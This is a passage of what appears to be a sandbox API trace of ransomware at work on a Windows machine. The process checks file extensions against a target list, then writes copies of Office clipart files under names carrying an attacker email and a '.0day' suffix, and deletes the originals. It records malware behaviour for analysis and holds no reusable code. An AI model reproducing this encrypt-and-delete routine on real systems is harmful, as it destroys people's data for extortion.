[0272.498] lstrlenW (lpString=".bz2") returned 4 [0272.498] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.498] lstrlenW (lpString=".7z") returned 3 [0272.498] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.498] lstrlenW (lpString=".dbf") returned 4 [0272.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.498] lstrlenW (lpString=".1cd") returned 4 [0272.498] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0272.498] lstrlenW (lpString=".jpg") returned 4 [0272.498] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.498] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.498] lstrlenW (lpString="DD00256_.WMF") returned 12 [0272.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.516] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2832) returned 1 [0272.516] CloseHandle (hObject=0x3a8) returned 1 [0272.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 0x20 [0272.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.526] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.526] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.527] GetLastError () returned 0x0 [0272.527] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xb10, lpOverlapped=0x0) returned 1 [0272.531] WriteFile (in: hFile=0x378, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xb20, lpOverlapped=0x0) returned 1 [0272.532] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.532] WriteFile (in: hFile=0x378, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.532] SetEndOfFile (hFile=0x378) returned 1 [0272.532] CloseHandle (hObject=0x378) returned 1 [0272.532] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.533] SetEndOfFile (hFile=0x37c) returned 1 [0272.535] CloseHandle (hObject=0x37c) returned 1 [0272.535] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 1 [0272.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.535] lstrlenW (lpString=".doc") returned 4 [0272.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.535] lstrlenW (lpString=".docx") returned 5 [0272.535] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.535] lstrlenW (lpString=".pdf") returned 4 [0272.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.535] lstrlenW (lpString=".xls") returned 4 [0272.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.535] lstrlenW (lpString=".xlsx") returned 5 [0272.536] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.536] lstrlenW (lpString=".ppt") returned 4 [0272.536] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.536] lstrlenW (lpString=".zip") returned 4 [0272.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.536] lstrlenW (lpString=".rar") returned 4 [0272.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString=".bz2") returned 4 [0272.536] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString=".7z") returned 3 [0272.536] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.536] lstrlenW (lpString=".dbf") returned 4 [0272.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.536] lstrlenW (lpString=".1cd") returned 4 [0272.536] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.536] lstrlenW (lpString=".jpg") returned 4 [0272.536] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.536] lstrlenW (lpString=".doc") returned 4 [0272.536] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString=".docx") returned 5 [0272.536] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.536] lstrlenW (lpString=".pdf") returned 4 [0272.536] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.536] lstrlenW (lpString=".xls") returned 4 [0272.536] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.536] lstrlenW (lpString=".xlsx") returned 5 [0272.536] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.537] lstrlenW (lpString=".ppt") returned 4 [0272.537] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.537] lstrlenW (lpString=".zip") returned 4 [0272.537] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.537] lstrlenW (lpString=".rar") returned 4 [0272.537] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.537] lstrlenW (lpString=".bz2") returned 4 [0272.537] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.537] lstrlenW (lpString=".7z") returned 3 [0272.537] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.537] lstrlenW (lpString=".dbf") returned 4 [0272.537] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.537] lstrlenW (lpString=".1cd") returned 4 [0272.537] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0272.537] lstrlenW (lpString=".jpg") returned 4 [0272.537] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.537] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.537] lstrlenW (lpString="DD00261_.WMF") returned 12 [0272.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.538] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=37974) returned 1 [0272.538] CloseHandle (hObject=0x37c) returned 1 [0272.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 0x20 [0272.538] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.538] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.538] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.541] GetLastError () returned 0x0 [0272.541] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x9456, lpOverlapped=0x0) returned 1 [0272.545] WriteFile (in: hFile=0x378, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x9460, lpOverlapped=0x0) returned 1 [0272.547] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.547] WriteFile (in: hFile=0x378, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.547] SetEndOfFile (hFile=0x378) returned 1 [0272.547] CloseHandle (hObject=0x378) returned 1 [0272.547] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.547] SetEndOfFile (hFile=0x37c) returned 1 [0272.550] CloseHandle (hObject=0x37c) returned 1 [0272.550] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.550] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf")) returned 1 [0272.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.550] lstrlenW (lpString=".doc") returned 4 [0272.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.550] lstrlenW (lpString=".docx") returned 5 [0272.550] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.550] lstrlenW (lpString=".pdf") returned 4 [0272.550] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.550] lstrlenW (lpString=".xls") returned 4 [0272.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.550] lstrlenW (lpString=".xlsx") returned 5 [0272.550] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.551] lstrlenW (lpString=".ppt") returned 4 [0272.551] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.551] lstrlenW (lpString=".zip") returned 4 [0272.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.551] lstrlenW (lpString=".rar") returned 4 [0272.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString=".bz2") returned 4 [0272.551] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString=".7z") returned 3 [0272.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.551] lstrlenW (lpString=".dbf") returned 4 [0272.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.551] lstrlenW (lpString=".1cd") returned 4 [0272.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.551] lstrlenW (lpString=".jpg") returned 4 [0272.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.551] lstrlenW (lpString=".doc") returned 4 [0272.551] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString=".docx") returned 5 [0272.551] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.551] lstrlenW (lpString=".pdf") returned 4 [0272.551] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.551] lstrlenW (lpString=".xls") returned 4 [0272.551] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.551] lstrlenW (lpString=".xlsx") returned 5 [0272.551] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.551] lstrlenW (lpString=".ppt") returned 4 [0272.551] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.552] lstrlenW (lpString=".zip") returned 4 [0272.552] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.552] lstrlenW (lpString=".rar") returned 4 [0272.552] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.552] lstrlenW (lpString=".bz2") returned 4 [0272.552] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.552] lstrlenW (lpString=".7z") returned 3 [0272.552] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.552] lstrlenW (lpString=".dbf") returned 4 [0272.552] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.552] lstrlenW (lpString=".1cd") returned 4 [0272.552] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 63 [0272.552] lstrlenW (lpString=".jpg") returned 4 [0272.552] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.552] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0272.552] lstrlenW (lpString="DD00297_.WMF") returned 12 [0272.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.553] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=40030) returned 1 [0272.553] CloseHandle (hObject=0x37c) returned 1 [0272.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 0x20 [0272.553] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0272.553] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.553] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.557] GetLastError () returned 0x0 [0272.558] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x9c5e, lpOverlapped=0x0) returned 1 [0272.766] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x9c60, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x9c60, lpOverlapped=0x0) returned 1 [0272.768] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0272.768] WriteFile (in: hFile=0x388, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.768] SetEndOfFile (hFile=0x388) returned 1 [0272.908] CloseHandle (hObject=0x388) returned 1 [0272.908] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0272.908] SetEndOfFile (hFile=0x37c) returned 1 [0273.043] CloseHandle (hObject=0x37c) returned 1 [0273.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.100] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf")) returned 1 [0273.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.110] lstrlenW (lpString=".doc") returned 4 [0273.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.110] lstrlenW (lpString=".docx") returned 5 [0273.110] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.111] lstrlenW (lpString=".pdf") returned 4 [0273.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".xls") returned 4 [0273.111] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.111] lstrlenW (lpString=".xlsx") returned 5 [0273.111] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.111] lstrlenW (lpString=".ppt") returned 4 [0273.111] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.111] lstrlenW (lpString=".zip") returned 4 [0273.111] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.111] lstrlenW (lpString=".rar") returned 4 [0273.111] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".bz2") returned 4 [0273.111] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".7z") returned 3 [0273.111] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.111] lstrlenW (lpString=".dbf") returned 4 [0273.111] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.111] lstrlenW (lpString=".1cd") returned 4 [0273.111] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.111] lstrlenW (lpString=".jpg") returned 4 [0273.111] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.111] lstrlenW (lpString=".doc") returned 4 [0273.111] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.111] lstrlenW (lpString=".docx") returned 5 [0273.111] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.111] lstrlenW (lpString=".pdf") returned 4 [0273.111] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".xls") returned 4 [0273.112] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.112] lstrlenW (lpString=".xlsx") returned 5 [0273.112] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.112] lstrlenW (lpString=".ppt") returned 4 [0273.112] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.112] lstrlenW (lpString=".zip") returned 4 [0273.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.112] lstrlenW (lpString=".rar") returned 4 [0273.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".bz2") returned 4 [0273.112] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString=".7z") returned 3 [0273.112] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.112] lstrlenW (lpString=".dbf") returned 4 [0273.112] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.112] lstrlenW (lpString=".1cd") returned 4 [0273.112] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 63 [0273.112] lstrlenW (lpString=".jpg") returned 4 [0273.112] lstrcmpiW 